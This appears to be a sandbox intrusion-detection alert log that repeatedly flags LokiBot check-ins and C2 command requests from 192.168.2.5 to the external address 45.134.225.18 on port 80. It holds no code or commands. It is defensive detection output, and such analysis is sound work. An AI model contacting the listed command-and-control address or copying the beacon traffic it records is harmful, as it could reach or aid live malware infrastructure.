                12/03/20-09:58:50.510260TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.545.134.225.18
                12/03/20-09:58:50.510260TCP2025381ET TROJAN LokiBot Checkin4980280192.168.2.545.134.225.18
                12/03/20-09:58:50.510260TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980280192.168.2.545.134.225.18
                12/03/20-09:58:50.787166TCP2570WEB-MISC Invalid HTTP Version String4980380192.168.2.545.134.225.18
                12/03/20-09:58:50.787166TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980380192.168.2.545.134.225.18
                12/03/20-09:58:50.787166TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980380192.168.2.545.134.225.18
                12/03/20-09:58:50.787166TCP2025381ET TROJAN LokiBot Checkin4980380192.168.2.545.134.225.18
                12/03/20-09:58:50.787166TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980380192.168.2.545.134.225.18
                12/03/20-09:58:51.073040TCP2570WEB-MISC Invalid HTTP Version String4980480192.168.2.545.134.225.18
                12/03/20-09:58:51.073040TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.545.134.225.18
                12/03/20-09:58:51.073040TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.545.134.225.18
                12/03/20-09:58:51.073040TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.545.134.225.18
                12/03/20-09:58:51.073040TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980480192.168.2.545.134.225.18
                12/03/20-09:58:51.401556TCP2570WEB-MISC Invalid HTTP Version String4980580192.168.2.545.134.225.18
                12/03/20-09:58:51.401556TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.545.134.225.18
                12/03/20-09:58:51.401556TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.545.134.225.18
                12/03/20-09:58:51.401556TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.545.134.225.18
                12/03/20-09:58:51.401556TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980580192.168.2.545.134.225.18
                12/03/20-09:58:51.679534TCP2570WEB-MISC Invalid HTTP Version String4980680192.168.2.545.134.225.18
                12/03/20-09:58:51.679534TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.545.134.225.18
                12/03/20-09:58:51.679534TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.545.134.225.18
                12/03/20-09:58:51.679534TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.545.134.225.18
                12/03/20-09:58:51.679534TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980680192.168.2.545.134.225.18
                12/03/20-09:58:51.956255TCP2570WEB-MISC Invalid HTTP Version String4980780192.168.2.545.134.225.18
                12/03/20-09:58:51.956255TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.545.134.225.18
                12/03/20-09:58:51.956255TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.545.134.225.18
                12/03/20-09:58:51.956255TCP2025381ET TROJAN LokiBot Checkin4980780192.168.2.545.134.225.18
                12/03/20-09:58:51.956255TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.2.545.134.225.18
                12/03/20-09:58:52.241457TCP2570WEB-MISC Invalid HTTP Version String4980880192.168.2.545.134.225.18
                12/03/20-09:58:52.241457TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.2.545.134.225.18
                12/03/20-09:58:52.241457TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.2.545.134.225.18
                12/03/20-09:58:52.241457TCP2025381ET TROJAN LokiBot Checkin4980880192.168.2.545.134.225.18
                12/03/20-09:58:52.241457TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980880192.168.2.545.134.225.18
                12/03/20-09:58:52.527524TCP2570WEB-MISC Invalid HTTP Version String4980980192.168.2.545.134.225.18
                12/03/20-09:58:52.527524TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.2.545.134.225.18
                12/03/20-09:58:52.527524TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.2.545.134.225.18
                12/03/20-09:58:52.527524TCP2025381ET TROJAN LokiBot Checkin4980980192.168.2.545.134.225.18
                12/03/20-09:58:52.527524TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980980192.168.2.545.134.225.18
                12/03/20-09:58:52.803694TCP2570WEB-MISC Invalid HTTP Version String4981080192.168.2.545.134.225.18
                12/03/20-09:58:52.803694TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.2.545.134.225.18
                12/03/20-09:58:52.803694TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.545.134.225.18
                12/03/20-09:58:52.803694TCP2025381ET TROJAN LokiBot Checkin4981080192.168.2.545.134.225.18
                12/03/20-09:58:52.803694TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981080192.168.2.545.134.225.18
                12/03/20-09:58:53.093245TCP2570WEB-MISC Invalid HTTP Version String4981180192.168.2.545.134.225.18
                12/03/20-09:58:53.093245TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.545.134.225.18
                12/03/20-09:58:53.093245TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.545.134.225.18
                12/03/20-09:58:53.093245TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.545.134.225.18
                12/03/20-09:58:53.093245TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981180192.168.2.545.134.225.18
                12/03/20-09:58:53.377981TCP2570WEB-MISC Invalid HTTP Version String4981280192.168.2.545.134.225.18
                12/03/20-09:58:53.377981TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.545.134.225.18
                12/03/20-09:58:53.377981TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.545.134.225.18
                12/03/20-09:58:53.377981TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.545.134.225.18
                12/03/20-09:58:53.377981TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981280192.168.2.545.134.225.18
                12/03/20-09:58:53.839627TCP2570WEB-MISC Invalid HTTP Version String4981380192.168.2.545.134.225.18
                12/03/20-09:58:53.839627TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.545.134.225.18
                12/03/20-09:58:53.839627TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.545.134.225.18
                12/03/20-09:58:53.839627TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.545.134.225.18
                12/03/20-09:58:53.839627TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.2.545.134.225.18
                12/03/20-09:58:54.113686TCP2570WEB-MISC Invalid HTTP Version String4981480192.168.2.545.134.225.18
                12/03/20-09:58:54.113686TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.545.134.225.18
                12/03/20-09:58:54.113686TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.545.134.225.18
                12/03/20-09:58:54.113686TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.545.134.225.18
                12/03/20-09:58:54.113686TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.2.545.134.225.18
                12/03/20-09:58:54.409421TCP2570WEB-MISC Invalid HTTP Version String4981580192.168.2.545.134.225.18
                12/03/20-09:58:54.409421TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.545.134.225.18
                12/03/20-09:58:54.409421TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.545.134.225.18
                12/03/20-09:58:54.409421TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.545.134.225.18
                12/03/20-09:58:54.409421TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981580192.168.2.545.134.225.18
                12/03/20-09:58:54.956180TCP2570WEB-MISC Invalid HTTP Version String4981680192.168.2.545.134.225.18
                12/03/20-09:58:54.956180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.545.134.225.18
                12/03/20-09:58:54.956180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.545.134.225.18
                12/03/20-09:58:54.956180TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.545.134.225.18
                12/03/20-09:58:54.956180TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981680192.168.2.545.134.225.18
                12/03/20-09:58:55.251442TCP2570WEB-MISC Invalid HTTP Version String4981780192.168.2.545.134.225.18
                12/03/20-09:58:55.251442TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.545.134.225.18
                12/03/20-09:58:55.251442TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.545.134.225.18
                12/03/20-09:58:55.251442TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.545.134.225.18
                12/03/20-09:58:55.251442TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.2.545.134.225.18
                12/03/20-09:58:56.104521TCP2570WEB-MISC Invalid HTTP Version String4981880192.168.2.545.134.225.18
                12/03/20-09:58:56.104521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.545.134.225.18
                12/03/20-09:58:56.104521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.545.134.225.18
                12/03/20-09:58:56.104521TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.545.134.225.18
                12/03/20-09:58:56.104521TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.2.545.134.225.18
                12/03/20-09:58:56.845938TCP2570WEB-MISC Invalid HTTP Version String4981980192.168.2.545.134.225.18
                12/03/20-09:58:56.845938TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.545.134.225.18
                12/03/20-09:58:56.845938TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.545.134.225.18
                12/03/20-09:58:56.845938TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.545.134.225.18
                12/03/20-09:58:56.845938TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981980192.168.2.545.134.225.18
                12/03/20-09:58:57.170565TCP2570WEB-MISC Invalid HTTP Version String4982080192.168.2.545.134.225.18
                12/03/20-09:58:57.170565TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.545.134.225.18
                12/03/20-09:58:57.170565TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.545.134.225.18
                12/03/20-09:58:57.170565TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.545.134.225.18
                12/03/20-09:58:57.170565TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.2.545.134.225.18
                12/03/20-09:58:57.446674TCP2570WEB-MISC Invalid HTTP Version String4982180192.168.2.545.134.225.18
                12/03/20-09:58:57.446674TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.545.134.225.18
                12/03/20-09:58:57.446674TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.545.134.225.18
                12/03/20-09:58:57.446674TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.545.134.225.18
                12/03/20-09:58:57.446674TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982180192.168.2.545.134.225.18
                12/03/20-09:58:57.729424TCP2570WEB-MISC Invalid HTTP Version String4982280192.168.2.545.134.225.18
                12/03/20-09:58:57.729424TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.545.134.225.18
                12/03/20-09:58:57.729424TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.545.134.225.18
                12/03/20-09:58:57.729424TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.545.134.225.18
                12/03/20-09:58:57.729424TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982280192.168.2.545.134.225.18
                12/03/20-09:58:58.017428TCP2570WEB-MISC Invalid HTTP Version String4982380192.168.2.545.134.225.18
                12/03/20-09:58:58.017428TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.545.134.225.18
                12/03/20-09:58:58.017428TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.545.134.225.18
                12/03/20-09:58:58.017428TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.545.134.225.18
                12/03/20-09:58:58.017428TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.545.134.225.18
                12/03/20-09:58:58.309820TCP2570WEB-MISC Invalid HTTP Version String4982480192.168.2.545.134.225.18
                12/03/20-09:58:58.309820TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.2.545.134.225.18
                12/03/20-09:58:58.309820TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.2.545.134.225.18
                12/03/20-09:58:58.309820TCP2025381ET TROJAN LokiBot Checkin4982480192.168.2.545.134.225.18
                12/03/20-09:58:58.309820TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982480192.168.2.545.134.225.18
                12/03/20-09:58:58.587872TCP2570WEB-MISC Invalid HTTP Version String4982580192.168.2.545.134.225.18
                12/03/20-09:58:58.587872TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.545.134.225.18
                12/03/20-09:58:58.587872TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.545.134.225.18
                12/03/20-09:58:58.587872TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.545.134.225.18
                12/03/20-09:58:58.587872TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.2.545.134.225.18
                12/03/20-09:58:58.873859TCP2570WEB-MISC Invalid HTTP Version String4982680192.168.2.545.134.225.18
                12/03/20-09:58:58.873859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.545.134.225.18
                12/03/20-09:58:58.873859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.545.134.225.18
                12/03/20-09:58:58.873859TCP2025381ET TROJAN LokiBot Checkin4982680192.168.2.545.134.225.18
                12/03/20-09:58:58.873859TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982680192.168.2.545.134.225.18
                12/03/20-09:58:59.152763TCP2570WEB-MISC Invalid HTTP Version String4982780192.168.2.545.134.225.18
                12/03/20-09:58:59.152763TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982780192.168.2.545.134.225.18
                12/03/20-09:58:59.152763TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982780192.168.2.545.134.225.18
                12/03/20-09:58:59.152763TCP2025381ET TROJAN LokiBot Checkin4982780192.168.2.545.134.225.18
                12/03/20-09:58:59.152763TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982780192.168.2.545.134.225.18
                12/03/20-09:58:59.438654TCP2570WEB-MISC Invalid HTTP Version String4982880192.168.2.545.134.225.18
                12/03/20-09:58:59.438654TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.2.545.134.225.18
                12/03/20-09:58:59.438654TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.2.545.134.225.18
                12/03/20-09:58:59.438654TCP2025381ET TROJAN LokiBot Checkin4982880192.168.2.545.134.225.18
                12/03/20-09:58:59.438654TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982880192.168.2.545.134.225.18
                12/03/20-09:58:59.721865TCP2570WEB-MISC Invalid HTTP Version String4982980192.168.2.545.134.225.18
                12/03/20-09:58:59.721865TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982980192.168.2.545.134.225.18
                12/03/20-09:58:59.721865TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982980192.168.2.545.134.225.18
                12/03/20-09:58:59.721865TCP2025381ET TROJAN LokiBot Checkin4982980192.168.2.545.134.225.18
                12/03/20-09:58:59.721865TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982980192.168.2.545.134.225.18
                12/03/20-09:59:00.010755TCP2570WEB-MISC Invalid HTTP Version String4983080192.168.2.545.134.225.18
                12/03/20-09:59:00.010755TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.2.545.134.225.18
                12/03/20-09:59:00.010755TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.2.545.134.225.18
                12/03/20-09:59:00.010755TCP2025381ET TROJAN LokiBot Checkin4983080192.168.2.545.134.225.18
                12/03/20-09:59:00.010755TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983080192.168.2.545.134.225.18
                12/03/20-09:59:00.301368TCP2570WEB-MISC Invalid HTTP Version String4983180192.168.2.545.134.225.18
                12/03/20-09:59:00.301368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983180192.168.2.545.134.225.18
                12/03/20-09:59:00.301368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983180192.168.2.545.134.225.18
                12/03/20-09:59:00.301368TCP2025381ET TROJAN LokiBot Checkin4983180192.168.2.545.134.225.18
                12/03/20-09:59:00.301368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983180192.168.2.545.134.225.18
                12/03/20-09:59:00.583029TCP2570WEB-MISC Invalid HTTP Version String4983280192.168.2.545.134.225.18
                12/03/20-09:59:00.583029TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.545.134.225.18
                12/03/20-09:59:00.583029TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.545.134.225.18
                12/03/20-09:59:00.583029TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.545.134.225.18
                12/03/20-09:59:00.583029TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983280192.168.2.545.134.225.18
                12/03/20-09:59:00.871001TCP2570WEB-MISC Invalid HTTP Version String4983380192.168.2.545.134.225.18
                12/03/20-09:59:00.871001TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.545.134.225.18
                12/03/20-09:59:00.871001TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.545.134.225.18
                12/03/20-09:59:00.871001TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.545.134.225.18
                12/03/20-09:59:00.871001TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983380192.168.2.545.134.225.18
                12/03/20-09:59:01.143196TCP2570WEB-MISC Invalid HTTP Version String4983480192.168.2.545.134.225.18
                12/03/20-09:59:01.143196TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.545.134.225.18
                12/03/20-09:59:01.143196TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.545.134.225.18
                12/03/20-09:59:01.143196TCP2025381ET TROJAN LokiBot Checkin4983480192.168.2.545.134.225.18
                12/03/20-09:59:01.143196TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983480192.168.2.545.134.225.18
                12/03/20-09:59:01.429145TCP2570WEB-MISC Invalid HTTP Version String4983580192.168.2.545.134.225.18
                12/03/20-09:59:01.429145TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983580192.168.2.545.134.225.18
                12/03/20-09:59:01.429145TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983580192.168.2.545.134.225.18
                12/03/20-09:59:01.429145TCP2025381ET TROJAN LokiBot Checkin4983580192.168.2.545.134.225.18
                12/03/20-09:59:01.429145TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983580192.168.2.545.134.225.18
                12/03/20-09:59:01.725157TCP2570WEB-MISC Invalid HTTP Version String4983780192.168.2.545.134.225.18
                12/03/20-09:59:01.725157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983780192.168.2.545.134.225.18
                12/03/20-09:59:01.725157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983780192.168.2.545.134.225.18
                12/03/20-09:59:01.725157TCP2025381ET TROJAN LokiBot Checkin4983780192.168.2.545.134.225.18
                12/03/20-09:59:01.725157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983780192.168.2.545.134.225.18
                12/03/20-09:59:02.017505TCP2570WEB-MISC Invalid HTTP Version String4983880192.168.2.545.134.225.18
                12/03/20-09:59:02.017505TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983880192.168.2.545.134.225.18
                12/03/20-09:59:02.017505TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983880192.168.2.545.134.225.18
                12/03/20-09:59:02.017505TCP2025381ET TROJAN LokiBot Checkin4983880192.168.2.545.134.225.18
                12/03/20-09:59:02.017505TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983880192.168.2.545.134.225.18
                12/03/20-09:59:02.314833TCP2570WEB-MISC Invalid HTTP Version String4983980192.168.2.545.134.225.18
                12/03/20-09:59:02.314833TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983980192.168.2.545.134.225.18
                12/03/20-09:59:02.314833TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983980192.168.2.545.134.225.18
                12/03/20-09:59:02.314833TCP2025381ET TROJAN LokiBot Checkin4983980192.168.2.545.134.225.18
                12/03/20-09:59:02.314833TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983980192.168.2.545.134.225.18
                12/03/20-09:59:02.608496TCP2570WEB-MISC Invalid HTTP Version String4984080192.168.2.545.134.225.18
                12/03/20-09:59:02.608496TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.2.545.134.225.18
                12/03/20-09:59:02.608496TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.2.545.134.225.18
                12/03/20-09:59:02.608496TCP2025381ET TROJAN LokiBot Checkin4984080192.168.2.545.134.225.18
                12/03/20-09:59:02.608496TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984080192.168.2.545.134.225.18
                12/03/20-09:59:02.886695TCP2570WEB-MISC Invalid HTTP Version String4984180192.168.2.545.134.225.18
                12/03/20-09:59:02.886695TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.545.134.225.18
                12/03/20-09:59:02.886695TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.545.134.225.18
                12/03/20-09:59:02.886695TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.545.134.225.18
                12/03/20-09:59:02.886695TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984180192.168.2.545.134.225.18
                12/03/20-09:59:03.160439TCP2570WEB-MISC Invalid HTTP Version String4984280192.168.2.545.134.225.18
                12/03/20-09:59:03.160439TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.2.545.134.225.18
                12/03/20-09:59:03.160439TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.2.545.134.225.18
                12/03/20-09:59:03.160439TCP2025381ET TROJAN LokiBot Checkin4984280192.168.2.545.134.225.18
                12/03/20-09:59:03.160439TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984280192.168.2.545.134.225.18
                12/03/20-09:59:03.437818TCP2570WEB-MISC Invalid HTTP Version String4984380192.168.2.545.134.225.18
                12/03/20-09:59:03.437818TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.545.134.225.18
                12/03/20-09:59:03.437818TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.545.134.225.18
                12/03/20-09:59:03.437818TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.545.134.225.18
                12/03/20-09:59:03.437818TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984380192.168.2.545.134.225.18
                12/03/20-09:59:03.717615TCP2570WEB-MISC Invalid HTTP Version String4984480192.168.2.545.134.225.18
                12/03/20-09:59:03.717615TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.2.545.134.225.18
                12/03/20-09:59:03.717615TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.2.545.134.225.18
                12/03/20-09:59:03.717615TCP2025381ET TROJAN LokiBot Checkin4984480192.168.2.545.134.225.18
                12/03/20-09:59:03.717615TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984480192.168.2.545.134.225.18
                12/03/20-09:59:04.005646TCP2570WEB-MISC Invalid HTTP Version String4984580192.168.2.545.134.225.18
                12/03/20-09:59:04.005646TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.545.134.225.18
                12/03/20-09:59:04.005646TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.545.134.225.18
                12/03/20-09:59:04.005646TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.545.134.225.18
                12/03/20-09:59:04.005646TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.2.545.134.225.18
                12/03/20-09:59:04.290575TCP2570WEB-MISC Invalid HTTP Version String4984780192.168.2.545.134.225.18
                12/03/20-09:59:04.290575TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984780192.168.2.545.134.225.18
                12/03/20-09:59:04.290575TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984780192.168.2.545.134.225.18
                12/03/20-09:59:04.290575TCP2025381ET TROJAN LokiBot Checkin4984780192.168.2.545.134.225.18
                12/03/20-09:59:04.290575TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984780192.168.2.545.134.225.18
                12/03/20-09:59:04.568647TCP2570WEB-MISC Invalid HTTP Version String4984880192.168.2.545.134.225.18
                12/03/20-09:59:04.568647TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.2.545.134.225.18
                12/03/20-09:59:04.568647TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.2.545.134.225.18
                12/03/20-09:59:04.568647TCP2025381ET TROJAN LokiBot Checkin4984880192.168.2.545.134.225.18
                12/03/20-09:59:04.568647TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984880192.168.2.545.134.225.18
                12/03/20-09:59:04.849861TCP2570WEB-MISC Invalid HTTP Version String4984980192.168.2.545.134.225.18
                12/03/20-09:59:04.849861TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984980192.168.2.545.134.225.18
                12/03/20-09:59:04.849861TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984980192.168.2.545.134.225.18
                12/03/20-09:59:04.849861TCP2025381ET TROJAN LokiBot Checkin4984980192.168.2.545.134.225.18
                12/03/20-09:59:04.849861TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984980192.168.2.545.134.225.18
                12/03/20-09:59:05.128707TCP2570WEB-MISC Invalid HTTP Version String4985080192.168.2.545.134.225.18
                12/03/20-09:59:05.128707TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.545.134.225.18
                12/03/20-09:59:05.128707TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.545.134.225.18
                12/03/20-09:59:05.128707TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.545.134.225.18
                12/03/20-09:59:05.128707TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985080192.168.2.545.134.225.18
                12/03/20-09:59:05.408354TCP2570WEB-MISC Invalid HTTP Version String4985180192.168.2.545.134.225.18
                12/03/20-09:59:05.408354TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.545.134.225.18
                12/03/20-09:59:05.408354TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.545.134.225.18
                12/03/20-09:59:05.408354TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.545.134.225.18
                12/03/20-09:59:05.408354TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985180192.168.2.545.134.225.18
                12/03/20-09:59:05.686313TCP2570WEB-MISC Invalid HTTP Version String4985280192.168.2.545.134.225.18
                12/03/20-09:59:05.686313TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.545.134.225.18
                12/03/20-09:59:05.686313TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.545.134.225.18
                12/03/20-09:59:05.686313TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.545.134.225.18
                12/03/20-09:59:05.686313TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985280192.168.2.545.134.225.18
                12/03/20-09:59:05.957218TCP2570WEB-MISC Invalid HTTP Version String4985380192.168.2.545.134.225.18
                12/03/20-09:59:05.957218TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.545.134.225.18
                12/03/20-09:59:05.957218TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.545.134.225.18
                12/03/20-09:59:05.957218TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.545.134.225.18
                12/03/20-09:59:05.957218TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985380192.168.2.545.134.225.18
                12/03/20-09:59:06.236263TCP2570WEB-MISC Invalid HTTP Version String4985680192.168.2.545.134.225.18
                12/03/20-09:59:06.236263TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.545.134.225.18
